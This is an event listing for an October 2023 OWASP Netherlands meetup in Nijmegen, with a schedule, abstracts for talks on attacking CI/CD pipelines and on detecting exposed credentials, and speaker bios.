October 2023 OWASP Chapter Netherlands Meetup

Location: Radboud University, Huygens building
Address: Heyendaalseweg 135, Nijmegen

See https://owasp.org/www-chapter-netherlands/upcomingevents for more information about the OWASP Netherlands chapter.

18:00 - 18:15 - Reception of attendees
18:15 - 19:00 - Pizza
19:00 - 19:15 - Welcome and OWASP updates
19:15 - 20:00 - Hacking CI/CD pipelines: a few considerations when attacking a CI/CD orchestrator by Mauricio Cano
20.00 - 20:15 - Break with drinks
20:15 - 21:00 - Unveiling the secrets in your code: Detecting and Triaging exposed credentials at scale by Ingmar Vis

Hacking CI/CD Pipelines: Some use cases for hacking CI/CD orchestrators
Abstract:
In this talk, we will discuss the hacking of CI/CD orchestrators, with a focus on GitHub actions and what kind of things can be done from the perspective of a malicious insider. Some of the cases we will discuss are:
- Secret enumeration.
- Accessing infrastructure through runners.
- Public runners vs Private runners.
- Code injection in the pipeline and supply chain.
- GitHub commits information.
- Secret searching in the repository.
The goal is to provide a broad view on the attack surface that can be derived from CI/CD orchestrators and their runners, as well as to show a few demos on how this can be done.

Bio:
Mauricio Cano is a cloud pentester focused on container technologies. In particular, he focuses on the security of containers and serverless architectures. He has pentested Kubernetes clusters and serverless architectures for several multinational financial institutions. Prior to his security work, he has a background in academia and a Ph.D. in Computer Science from the University of Groningen, focused on programming language design and formal methods to ensure correctness. In his spare time, Cano enjoys reading, cooking, and solving puzzles.

Unveiling the secrets in your code: Detecting and Triaging exposed credentials at scale
Abstract:
Security misconfigurations are often easy to exploit but also easy to avoid. How can we raise security awareness and at the same time prevent security misconfigurations (such as leaked credentials) from reaching production? Is there an easy way to scan, triage and follow-up on exposed secrets at enterprise scale? ABN Amro open sourced Repository Scanner and runs Repository Scanner internally at scale, exposing secrets in source code repositories and thereby raising security awareness while at the same time improving the security posture by remediating security misconfigurations.

Bio:
Ingmar Vis has been working in CICD for 7 years. In his current role, Ingmar acts as a Product Owner for 2 teams at ABN Amro. 1 team is responsible for delivering the Secure Coding capability for all developers, the 2nd team is responsible for the infrastructure and automation of CICD tooling. Ingmar works on aspects such as Static Analysis, Software Composition Analysis, Container Security, and Secret Detection.